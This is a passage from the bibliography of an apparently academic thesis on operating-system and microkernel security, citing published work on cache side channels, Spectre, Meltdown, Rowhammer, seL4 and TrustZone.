2190-8508, 2190-8516. DOI: 10 . 1007 / s13389-016-0141-6. [9] D. Gens, O. Arias, D. Sullivan, C. Liebchen, Y. Jin, and A. R. Sadeghi. “LAZARUS: Practical Side-Channel Resilient Kernel-Space Randomization”. In: Research in Attacks, Intrusions, and Defenses. Ed. by M. Dacier, M. Bailey, M. Polychronakis, and M. Antonakakis. Springer International Publishing, 2017, pp. 238–258. ISBN: 978-3-319- 66332-6.

52 Bibliography

[10] D. Gruss, R. Spreitzer, and S. Mangard. “Cache Template Attacks: Automating Attacks on Inclusive Last-level Caches”. In: Proceedings of the 24th USENIX Conference on Security Symposium. SEC. event-place: Washington, D.C. USENIX Association, 2015, pp. 897– 912. ISBN: 978-1-931971-23-2. [11] D. Gullasch, E. Bangerter, and S. Krenn. “Cache Games – Bringing Access-Based Cache Attacks on AES to Practice”. In: IEEE Symposium on Security and Privacy. IEEE, May 2011, pp. 490–505. ISBN: 978-1-4577-0147-4. DOI: 10.1109/SP.2011.22. [12] M. Hamad, M. Nolte, and V. Prevelakis. “A framework for policy based secure intra vehicle communication”. In: 2017 IEEE Vehicular Networking Conference (VNC). Nov. 2017, pp. 1–8. DOI: 10.1109/VNC.2017.8275646. [13] M. Hamad and V. Prevelakis. “Implementation and performance evaluation of embedded IPsec in microkernel OS”. In: World Symposium on Computer Networks and Information Security (WSCNIS). Sept. 2015, pp. 1–7. DOI: 10.1109/WSCNIS.2015. 7368294. [14] S. Harp, T. Carpenter, and J. Hatcliff. “A Reference Architecture for Secure Medical Devices”. In: Biomedical Instrumentation & Technology 52.5 (Sept. 2018), pp. 357–365. ISSN: 0899-8205. DOI: 10.2345/0899-8205-52.5.357. [15] U. D. R. Hat. “What Every Programmer Should Know About Memory”. In: (2007), p. 114. [16] C. Hawblitzel, J. Howell, J. R. Lorch, A. Narayan, B. Parno, D. Zhang, and B. Zill. “Ironclad Apps: End-to-end Security via Automated Full-System Verification”. en. In: Proceedings of the 11th USENIX conference on Operating Systems Design and Implementation. 2014, p. 18. ISBN: 978-1-931971-16-4. [17] P. K. Immich, R. S. Bhagavatula, and D. Ravi Pendse. “Performance analysis of five interprocess communication mechanisms across UNIX operating systems.” In: The Journal of Systems & Software 68 (2003), pp. 27–43. ISSN: 0164-1212. DOI: 10 . 1016 / S0164-1212(02)00134-6. [18] Corporation Intel. “Intel Analysis of Speculative Execution Side Channels”. en. In: (2018), p. 12. [19] Corporation Intel. “Intel® 64 and IA-32 Architectures Optimization Reference Manual”. en. In: (2016), p. 672. [20] Corporation Intel. “Intel® 64 and IA-32 Architectures Software Developer’s Manual Documentation Changes”. en. In: (Sept. 2016), p. 1299. [21] G. Irazoqui, T. Eisenbarth, and B. Sunar. “S$A: A Shared Cache Attack That Works across Cores and Defies VM Sandboxing – and Its Application to AES”. In: IEEE Symposium on Security and Privacy. 2015, pp. 591–604. DOI: 10.1109/SP.2015.42. [22] V. Kiriansky and C. Waldspurger. “Speculative Buffer Overflows: Attacks and Defenses”. en. In: (July 2018). [23] G. Klein, K. Elphinstone, G. Heiser, J. Andronick, D. Cock, P. Derrin, D. Elkaduwe, K. Engelhardt, R. Kolanski, M. Norrish, T. Sewell, H. Tuch, and S. Winwood. “seL4: Formal Verification of an OS Kernel”. In: 22Nd Symposium on Operating Systems Principles (SOSP). ACM, 2009, pp. 207–220. ISBN: 978-1-60558-752-3. DOI: 10.1145/1629575. 1629596. [24] P. Kocher, J. Horn, A. Fogh, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom. “Spectre Attacks: Exploiting Speculative Execution”. In: 40th IEEE Symposium on Security and Privacy (S&P). 2019. [25] E. M. Koruyeh, K. N Khasawneh, C. Song, and N. Abu-Ghazaleh. “Spectre Returns! Speculation Attacks using the Return Stack Buffer”. In: 12th Workshop on Offensive Technologies (WOOT) (2018), p. 12.

53 Bibliography

[26] C. Lameter. “Extreme high performance computing or why microkernels suck”. In: Proceedings of the Ottawa Linux Symposium. 2007. [27] B. W. Lampson. “A Note on the Confinement Problem”. In: Commun. ACM 16.10 (Oct. 1973), pp. 613–615. ISSN: 0001-0782. DOI: 10.1145/362375.362389. [28] M. Lange, S. Liebergeld, A. Lackorzynski, A. Warg, and M. Peter. “L4Android: A Generic Operating System Framework for Secure Smartphones”. In: Proceedings of the 1st ACM Workshop on Security and Privacy in Smartphones and Mobile Devices. SPSM. ACM, 2011, pp. 39–50. ISBN: 978-1-4503-1000-0. DOI: 10.1145/2046614.2046623. [29] B. Lapid and A. Wool. “Cache-Attacks on the ARM TrustZone Implementations of AES- 256 and AES-256-GCM via GPU-Based Analysis”. In: Selected Areas in Cryptography (SAC). Ed. by C. Cid and M. J. Jacobson. Vol. 11349. 2019, pp. 235–256. ISBN: 978-3- 030-10969-1 978-3-030-10970-7. DOI: 10.1007/978-3-030-10970-7_11. [30] M. Lipp, M. T. Aga, M. Schwarz, D. Gruss, C. Maurice, L. Raab, and L. Lamster. “Nethammer: Inducing Rowhammer Faults through Network Requests”. In: abs/1805.04956 (May 2018). [31] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg. “Meltdown: Reading Kernel Memory from User Space”. In: 27th USENIX Security Symposium. 2018. [32] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee. “Last-Level Cache Side-Channel Attacks are Practical”. In: IEEE Symposium on Security and Privacy. IEEE, May 2015, pp. 605–622. ISBN: 978-1-4673-6949-7. DOI: 10.1109/SP.2015.43. [33] R. Mcilroy, J. Sevcik, T. Tebbi, B. L. Titzer, and T. Verwaest. “Spectre is here to stay: An analysis of side-channels and speculative execution”. In: abs/1902.05178 (Feb. 2019). arXiv: 1902.05178. [34] G. Paoloni. How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Intruction Set Architectures. Sept. 2010. [35] P. Pessl, D. Gruss, C. Maurice, M. Schwarz, and S. Mangard. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks”. en. In: 2016, pp. 565–581. [36] A. Prout, W. Arcand, D. Bestor, B. Bergeron, C. Byun, V. Gadepally, M. Houle, M. Hubbell, M. Jones, A. Klein, P. Michaleas, L. Milechin, J. Mullen, A. Rosa, S. Samsi, C. Yee, A. Reuther, and J. Kepner. “Measuring the Impact of Spectre and Meltdown”. In: IEEE High Performance extreme Computing Conference (HPEC). Sept. 2018, pp. 1–5. DOI: 10.1109/HPEC.2018.8547554. [37] J. R. Ramos. “TrustFrame, a Software Development Framework for TrustZone-enabled Hardware”. en. PhD thesis. Tecnico Ulisboa, Nov. 2016. [38] P. S. Ribeiro, N. Santos, and N. O. Duarte. “DBStore: A TrustZone-backed Database Management System for Mobile Applications”. en. In: (2018), p. 8. DOI: 10 . 5220 / 0006883603960403. [39] W. Schmidt, M. Hanspach, and J. Keller. “A Case Study on Covert Channel Establishment via Software Caches in High-Assurance Computing Systems”. In: (Aug. 2015). [40] M. Schwarz, M. Lipp, D. Moghimi, J. V. Bulck, J. Stecklina, T. Prescher, and D. Gruss. “ZombieLoad: Cross-Privilege-Boundary Data Sampling”. en. In: (May 2019), p. 15. [41] M. Schwarz, C. Maurice, D. Gruss, and S. Mangard. “Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript”. en. In: Financial Cryptography and Data Security. Lecture Notes in Computer Science. Springer International Publishing, 2017, pp. 247–267. ISBN: 978-3-319-70972-7.

54 Bibliography

[42] M. Schwarz, M. Schwarzl, M. Lipp, and D. Gruss. “NetSpectre: Read Arbitrary Memory over Network”. In: abs/1807.10535 (2018). [43] B. Stuart. “Current state of mitigations for Spectre within operating systems”. In: Proceedings of Workshop on Advanced Microkernel Operating Systems (WAMOS) (2018), p. 5. [44] A. Thongthua and S. Ngamsuriyaroj. “Assessment of Hypervisor Vulnerabilities.” In: International Conference on Cloud Computing Research and Innovations (ICCCRI) (2016), p. 71. ISSN: 978-1-5090-3951-7. DOI: 10.1109/ICCCRI.2016.19. [45] C. Trippel, D. Lustig, and M. Martonosi. “MeltdownPrime and SpectrePrime: Automatically-Synthesized Attacks Exploiting Invalidation-Based Coherence Protocols”. In: CoRR abs/1802.03802 (2018). [46] D. Waddington, J. Colmenares, J. Kuang, and F. Song. “KV-Cache: A Scalable High- Performance Web-Object Cache for Manycore”. en. In: IEEE/ACM 6th International Conference on Utility and Cloud Computing. IEEE, Dec. 2013, pp. 123–130. ISBN: 978-0- 7695-5152-4. DOI: 10.1109/UCC.2013.34. [47] Y. Xiao, X. Zhang, Y. Zhang, and R. Teodorescu. “One Bit Flips, One Cloud Flops: Cross- VM Row Hammer Attacks and ”. en. In: USENIX Association, 2016, pp. 19–35. ISBN: 978-1-931971-32-4. [48] Y. Yarom and K. Falkner. “Flush+reload: a high resolution, low noise, l3 cache side-channel attack”. en. In: 23rd USENIX Security Symposium USENIX Security. The USENIX Association, 2014. ISBN: 978-1-931971-15-7. [49] Z. Yu, C. Yuan, X. Wei, Y. Gao, and L. Wang. “Message-passing interprocess communication design in seL4”. In: 5th International Conference on Computer Science and Network Technology (ICCSNT). Dec. 2016, pp. 418–422. DOI: 10.1109/ICCSNT.2016. 8070192. [50] P. Zhou, T. Wang, G. Li, F. Zhang, and X. Zhao. “Analysis on the parameter selection method for FLUSH+RELOAD based cache timing attack on RSA”. In: China Communications 12.6 (June 2015), pp. 33–45. ISSN: 1673-5447. DOI: 10.1109/CC.2015. 7122479.

55